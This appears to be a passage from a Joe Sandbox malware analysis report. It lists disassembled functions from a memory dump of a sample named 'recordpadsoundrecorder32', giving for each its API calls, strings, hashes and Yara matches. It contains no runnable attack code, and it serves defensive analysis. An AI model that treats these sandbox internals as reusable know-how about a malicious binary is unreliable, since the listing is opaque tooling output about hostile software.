                                                                                      • API String ID: 2140441600-46888669
                                                                                      • Opcode ID: d1cb2065ba106fe8362820f07e6813301c766d2432c5f509d793058dde41f4c6
                                                                                      • Instruction ID: d015d34c6f66acba40f302f616180bb99ade262d61af8d4f97afce44df96722c
                                                                                      • Opcode Fuzzy Hash: d1cb2065ba106fe8362820f07e6813301c766d2432c5f509d793058dde41f4c6
                                                                                      • Instruction Fuzzy Hash: 0F2146B19097909FD710DF24C64475BBBE5BB89708F044E5DF8A587380D7B9A808CF96
                                                                                      Function 02614A2C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __getptd_noexit.LIBCMT ref: 02614A30
                                                                                        • Part of subcall function 02615C22: GetLastError.KERNEL32(00000000,?,02615E10,02612FE3,00000000,?,02618A7A,?,?,?,00000000,?,02618967,00000018,026316B8,00000008), ref: 02615C24
                                                                                        • Part of subcall function 02615C22: __calloc_crt.LIBCMT ref: 02615C45
                                                                                        • Part of subcall function 02615C22: __initptd.LIBCMT ref: 02615C67
                                                                                        • Part of subcall function 02615C22: GetCurrentThreadId.KERNEL32 ref: 02615C6E
                                                                                        • Part of subcall function 02615C22: SetLastError.KERNEL32(00000000,02618A7A,?,?,?,00000000,?,02618967,00000018,026316B8,00000008,026188B4,?,?,?,02615B38), ref: 02615C86
                                                                                      • __calloc_crt.LIBCMT ref: 02614A53
                                                                                      • __get_sys_err_msg.LIBCMT ref: 02614A71
                                                                                      • __invoke_watson.LIBCMT ref: 02614A8E
                                                                                      Strings
                                                                                      • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02614A3B, 02614A61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                      • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                      • API String ID: 109275364-798102604
                                                                                      • Opcode ID: 5c1ee0a6588e5af3a817214a99da8c0d5df29adee920639c53be8d8a93d3d0e3
                                                                                      • Instruction ID: 78e7b23efe0546b46e2f9b8cc8b514d005b7c47f5dd49a9cf88f174d98bebaf7
                                                                                      • Opcode Fuzzy Hash: 5c1ee0a6588e5af3a817214a99da8c0d5df29adee920639c53be8d8a93d3d0e3
                                                                                      • Instruction Fuzzy Hash: D8F0E032500B655BE621A5195C4062B719DDB807A4B0E041DF945D7384EE21FD015A9C
                                                                                      Function 02602341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02602350
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02602360
                                                                                      • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02602370
                                                                                      • GetLastError.KERNEL32 ref: 0260237A
                                                                                        • Part of subcall function 02601712: __EH_prolog.LIBCMT ref: 02601717
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                      • String ID: pqcs
                                                                                      • API String ID: 1619523792-2559862021
                                                                                      • Opcode ID: a08aa3b70d61f3b379b19cb6ace29cd23e7bfdee3c7565edb0166c32f869cec3
                                                                                      • Instruction ID: fe3aec9f0e845e4b8e3f37a308087ebb04c833af93d3bac5b72a06260cd9be41
                                                                                      • Opcode Fuzzy Hash: a08aa3b70d61f3b379b19cb6ace29cd23e7bfdee3c7565edb0166c32f869cec3
                                                                                      • Instruction Fuzzy Hash: 64F05470940704AFDB25AF749959FAFB7ACEF01701F014569FC05D3180EB70E9689B91
                                                                                      Function 02604030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02604035
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 02604042
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02604049
                                                                                      • std::exception::exception.LIBCMT ref: 02604063
                                                                                        • Part of subcall function 0260A678: __EH_prolog.LIBCMT ref: 0260A67D
                                                                                        • Part of subcall function 0260A678: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 0260A68C
                                                                                        • Part of subcall function 0260A678: __CxxThrowException@8.LIBCMT ref: 0260A6AB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                      • String ID: bad allocation
                                                                                      • API String ID: 3112922283-2104205924
                                                                                      • Opcode ID: 68fb3fda1f6e1816194d3c39f78b1730712be83b640c50f993f2c8f95170df42
                                                                                      • Instruction ID: c7afe769896b00f1e5e801bfb3cf83ed2590de8657b1b46f91abee32ab56872e
                                                                                      • Opcode Fuzzy Hash: 68fb3fda1f6e1816194d3c39f78b1730712be83b640c50f993f2c8f95170df42
                                                                                      • Instruction Fuzzy Hash: A7F08CB1E44619EBDB24EFE0DA08FAFB778EB08300F804559E916A2280DB34565C8F95
                                                                                      Function 00403D14 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00403D6D
                                                                                      • GetFileType.KERNEL32(00000800), ref: 00403E13
                                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00403E6C
                                                                                      • GetFileType.KERNEL32(00000000), ref: 00403E7A
                                                                                      • SetHandleCount.KERNEL32 ref: 00403EB1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHandleType$CountInfoStartup
                                                                                      • String ID:
                                                                                      • API String ID: 1710529072-0
                                                                                      • Opcode ID: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                                                      • Instruction ID: 9dbc4695f3205ced207c781c98d2c2eecf37425ec268f2c04ee58d1a3995b9ba
                                                                                      • Opcode Fuzzy Hash: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                                                      • Instruction Fuzzy Hash: 7C5143716046458BD7218F38CD887663FA8AF02B26F15473EE4A2FB2E0C7389A45C74D
                                                                                      Function 02611C30 Relevance: 7.6, APIs: 5, Instructions: 117COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 02611A00: CloseHandle.KERNEL32(00000000,3DC92DE0), ref: 02611A51
                                                                                        • Part of subcall function 02611A00: WaitForSingleObject.KERNEL32(?,000000FF,3DC92DE0,?,?,?,?,3DC92DE0,026119D3,3DC92DE0), ref: 02611A68
                                                                                      • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02611CCE
                                                                                      • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02611CEE
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02611D27
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02611D7B
                                                                                      • SetEvent.KERNEL32(?), ref: 02611D82
                                                                                        • Part of subcall function 0260418C: CloseHandle.KERNEL32(00000000,?,02611CB5), ref: 026041B0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 4166353394-0
                                                                                      • Opcode ID: d7e9774498cd994ec6adca0cbc5c0ca767ff400198080c7407e658819e40cc43
                                                                                      • Instruction ID: c17c3a4ae73f171774f0cfe411a613735b6b85ea23ccbed7bcf31da111943a19
                                                                                      • Opcode Fuzzy Hash: d7e9774498cd994ec6adca0cbc5c0ca767ff400198080c7407e658819e40cc43
                                                                                      • Instruction Fuzzy Hash: CA41DE70A007118BDB259F28DC80B2BB7A4EF46724F1806A8ED18DB385D734E8169BE5
                                                                                      Function 0260E0A6 Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260E0AB
                                                                                        • Part of subcall function 02601A01: TlsGetValue.KERNEL32 ref: 02601A0A
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0260E12A
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 0260E146
                                                                                      • InterlockedIncrement.KERNEL32(02635190), ref: 0260E16B
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 0260E180
                                                                                        • Part of subcall function 026027F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 0260284E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                      • String ID:
                                                                                      • API String ID: 1578506061-0
                                                                                      • Opcode ID: 74ac9768f1e4feef1e408909670001f102e3d0e137a7236be4d718399d642681
                                                                                      • Instruction ID: 9910552a10c25ff3dfc9888eee2830540402ab81f09f190501dd28506408e52e
                                                                                      • Opcode Fuzzy Hash: 74ac9768f1e4feef1e408909670001f102e3d0e137a7236be4d718399d642681
                                                                                      • Instruction Fuzzy Hash: D23149B1D016159FCB24DFA8C584AAEBBF8BF08310F04495ED849D7680E775AA08DFA4
                                                                                      Function 02620354 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 02620360
                                                                                        • Part of subcall function 02612F5C: __FF_MSGBANNER.LIBCMT ref: 02612F73
                                                                                        • Part of subcall function 02612F5C: __NMSG_WRITE.LIBCMT ref: 02612F7A
                                                                                        • Part of subcall function 02612F5C: RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 02612F9F
                                                                                      • _free.LIBCMT ref: 02620373
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                      • String ID:
                                                                                      • API String ID: 1020059152-0
                                                                                      • Opcode ID: 4950088763e86cd67396291913b222fe5cfe26fa4e29d7171cfd89f72daf93d9
                                                                                      • Instruction ID: d8cc060db3026676ffc266e510bd80e2bfb60be6314f10f184c240eefe3de019
                                                                                      • Opcode Fuzzy Hash: 4950088763e86cd67396291913b222fe5cfe26fa4e29d7171cfd89f72daf93d9
                                                                                      • Instruction Fuzzy Hash: CA11E772948E33AFCB312F70AA4475E76A9AF10360F044529FD0ACB280DB309498CED8
                                                                                      Function 026021D5 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 026021DA
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 026021ED
                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02602224
                                                                                      • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02602237
                                                                                      • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02602261
                                                                                        • Part of subcall function 02602341: InterlockedExchange.KERNEL32(?,00000001), ref: 02602350
                                                                                        • Part of subcall function 02602341: InterlockedExchange.KERNEL32(?,00000001), ref: 02602360
                                                                                        • Part of subcall function 02602341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02602370
                                                                                        • Part of subcall function 02602341: GetLastError.KERNEL32 ref: 0260237A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1856819132-0
                                                                                      • Opcode ID: 14ca31d0c6a1b8e04032c95c8a0b5cabb0d9964621d109111dc2d3c91f401577
                                                                                      • Instruction ID: c5f97f167ab0299968bb36cb528664898092eb4cfb37a9afa6aa223c03032339
                                                                                      • Opcode Fuzzy Hash: 14ca31d0c6a1b8e04032c95c8a0b5cabb0d9964621d109111dc2d3c91f401577
                                                                                      • Instruction Fuzzy Hash: A91184B1D40114EBCB1A9FA4D898AAFFFBAFF48310F00451AEC15922A0D7714595EF85
                                                                                      Function 02602298 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260229D
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 026022B0
                                                                                      • TlsGetValue.KERNEL32 ref: 026022E7
                                                                                      • TlsSetValue.KERNEL32(?), ref: 02602300
                                                                                      • TlsSetValue.KERNEL32(?,?,?), ref: 0260231C
                                                                                        • Part of subcall function 02602341: InterlockedExchange.KERNEL32(?,00000001), ref: 02602350
                                                                                        • Part of subcall function 02602341: InterlockedExchange.KERNEL32(?,00000001), ref: 02602360
                                                                                        • Part of subcall function 02602341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02602370
                                                                                        • Part of subcall function 02602341: GetLastError.KERNEL32 ref: 0260237A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1856819132-0
                                                                                      • Opcode ID: 7fa94755b3b11c5df519be942b68c26679521773df4e408465de6dddee98098e
                                                                                      • Instruction ID: a396d4db2194aee25705ae523c38dc763a5e94cd633c2b29a3f542655e250184
                                                                                      • Opcode Fuzzy Hash: 7fa94755b3b11c5df519be942b68c26679521773df4e408465de6dddee98098e
                                                                                      • Instruction Fuzzy Hash: 57115EB1D00118ABCB1A9FA4D884AAEFFBAFF48310F04451AEC05A3250DB7159A5DF94
                                                                                      Function 0260BCC0 Relevance: 7.5, APIs: 5, Instructions: 45synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0260B113: __EH_prolog.LIBCMT ref: 0260B118
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0260BCDD
                                                                                        • Part of subcall function 0261450A: RaiseException.KERNEL32(?,?,0260FB0D,?,?,?,?,?,?,?,0260FB0D,?,02630F68,?), ref: 0261455F
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02631D84,?,00000001), ref: 0260BCF3
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 0260BD06
                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02631D84,?,00000001), ref: 0260BD16
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0260BD24
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                      • String ID:
                                                                                      • API String ID: 2725315915-0
                                                                                      • Opcode ID: 7c48190282883e1130f3246a82e9ebc112d40c3cc29025609fe909a74c5a3989
                                                                                      • Instruction ID: b7ba25c80293229474f6c23aa486129176e0bc783ed84e2ded1b2a9ee16c13c2
                                                                                      • Opcode Fuzzy Hash: 7c48190282883e1130f3246a82e9ebc112d40c3cc29025609fe909a74c5a3989
                                                                                      • Instruction Fuzzy Hash: 5001D6B2A40244BFDB249AA0DCC9F8BB7ACEB04718F088914F625D71C0D760E8488B14
                                                                                      Function 02602420 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02602432
                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02602445
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02602454
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02602469
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02602470
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 747265849-0
                                                                                      • Opcode ID: 6734f8f7e924c3f23b7d18515970d77aae9634e5d665c3f717a24537cc90b014
                                                                                      • Instruction ID: 5b5425d664cf72e39eebdd508f6e8d8d3830de838573a4ac7c438197ceaad22f
                                                                                      • Opcode Fuzzy Hash: 6734f8f7e924c3f23b7d18515970d77aae9634e5d665c3f717a24537cc90b014
                                                                                      • Instruction Fuzzy Hash: 7DF06DB2640604BBD7159AA0ED89F9AB72CFF04701F805411F701D6080D761B968CBA1
                                                                                      Function 02601EC7 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 02601ED2
                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02601EEA
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02601EF9
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02601F0E
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02601F15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 830998967-0
                                                                                      • Opcode ID: 2e373ff4de3d73aa16af108b1286b0904ee73619b8c64684f315aec84407d52e
                                                                                      • Instruction ID: 94b25520c481e7ff6a440c86ad5623bd8705faf28a15d50de07a2595825623ac
                                                                                      • Opcode Fuzzy Hash: 2e373ff4de3d73aa16af108b1286b0904ee73619b8c64684f315aec84407d52e
                                                                                      • Instruction Fuzzy Hash: D0F06DB2541A04BBD712AFA0EC88FCAB72CFF04341F001415F60186440C771A5A88BE0
                                                                                      Function 026086FD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: 4acceb84b91498a4568c93e2e623eff17cfa202d0b21f9e1ddf51f1e3f44323e
                                                                                      • Instruction ID: 9574e916472680b25a27557abd60d376011e4bf363c398b5401b5d6b3455afb9
                                                                                      • Opcode Fuzzy Hash: 4acceb84b91498a4568c93e2e623eff17cfa202d0b21f9e1ddf51f1e3f44323e
                                                                                      • Instruction Fuzzy Hash: 4641C131300304ABDB3CDE69D8C4A5BBBAAEB41754B14092DE856877C1CBB0F805DBA8
                                                                                      Function 026030AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 026030C3
                                                                                      • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02603102
                                                                                      • _memcmp.LIBCMT ref: 02603141
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastString_memcmp
                                                                                      • String ID: 255.255.255.255
                                                                                      • API String ID: 1618111833-2422070025
                                                                                      • Opcode ID: 95e45255d76cc67861791c855ea8d4547077d1b168aaef5ae3c111bc7118561a
                                                                                      • Instruction ID: 9152d3cb199b0df8d2d5cfd332c4c05cbfd85baca6aea3448c5de5788658da38
                                                                                      • Opcode Fuzzy Hash: 95e45255d76cc67861791c855ea8d4547077d1b168aaef5ae3c111bc7118561a
                                                                                      • Instruction Fuzzy Hash: A23101719003049FDB249F64C8C0B6FB7A1AF49325F1545ADEC55973C0DB71A891CB80
                                                                                      Function 02601F56 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02601F5B
                                                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02601FC5
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 02601FD2
                                                                                        • Part of subcall function 02601712: __EH_prolog.LIBCMT ref: 02601717
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                      • String ID: iocp
                                                                                      • API String ID: 998023749-976528080
                                                                                      • Opcode ID: 3182ed3a120c447e55c5238b52ffebf3ab4f5d5577c256eb0168d50b468067a3
                                                                                      • Instruction ID: d1edbb2326904db3938f884ea789f34fc7d422efeae9754155301d9a34a327ab
                                                                                      • Opcode Fuzzy Hash: 3182ed3a120c447e55c5238b52ffebf3ab4f5d5577c256eb0168d50b468067a3
                                                                                      • Instruction Fuzzy Hash: 5921E4B1801B449FC720DF6AC54055BFBF8FFA5710B108A5FE4A683A90D7B0A648CF91
                                                                                      Function 004069AB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069CE
                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069E4
                                                                                      • LCMapStringW.KERNEL32(?,?,?,00000000,Wc@ ,?,?,00406357,00200020,00000000,?,00000000), ref: 00406A17
                                                                                      • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 00406A7F
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,Wc@ ,?,00000000,00000000,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 00406AA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$ByteCharMultiWide
                                                                                      • String ID: Wc@
                                                                                      • API String ID: 352835431-4128830131
                                                                                      • Opcode ID: 1312c45284bb9b0df6438f0e9267380287f1a9abf6012680dfeac5a7f92326d3
                                                                                      • Instruction ID: 95b79f799a9dc74ab8783d7474949c37cbdd673329ec6272a6b224a97d77f72f
                                                                                      • Opcode Fuzzy Hash: 1312c45284bb9b0df6438f0e9267380287f1a9abf6012680dfeac5a7f92326d3
                                                                                      • Instruction Fuzzy Hash: C2113A32A00209ABCF229F98CD04ADEBFB6FF49350F11816AF911722A0D3368D61DF54
                                                                                      Function 02613AFC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 02613B14
                                                                                        • Part of subcall function 02612F5C: __FF_MSGBANNER.LIBCMT ref: 02612F73
                                                                                        • Part of subcall function 02612F5C: __NMSG_WRITE.LIBCMT ref: 02612F7A
                                                                                        • Part of subcall function 02612F5C: RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 02612F9F
                                                                                      • std::exception::exception.LIBCMT ref: 02613B32
                                                                                      • __CxxThrowException@8.LIBCMT ref: 02613B47
                                                                                        • Part of subcall function 0261450A: RaiseException.KERNEL32(?,?,0260FB0D,?,?,?,?,?,?,?,0260FB0D,?,02630F68,?), ref: 0261455F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                      • String ID: bad allocation
                                                                                      • API String ID: 3074076210-2104205924
                                                                                      • Opcode ID: 412c079e47290f72670dc05a1ddf14283cefffef41af1c99023be716cae4bd92
                                                                                      • Instruction ID: cf0097a9ea84f655fe1f96a8b4626cc5b7095e6c6e40a7a0f30a00bb8f2ac013
                                                                                      • Opcode Fuzzy Hash: 412c079e47290f72670dc05a1ddf14283cefffef41af1c99023be716cae4bd92
                                                                                      • Instruction Fuzzy Hash: 30E0307450021AAAEF04FE64DE119AF7779AB10314F444599DC15A6290EB70AA18CED4
                                                                                      Function 026037B1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 026037B6
                                                                                      • __localtime64.LIBCMT ref: 026037C1
                                                                                        • Part of subcall function 026125B0: __gmtime64_s.LIBCMT ref: 026125C3
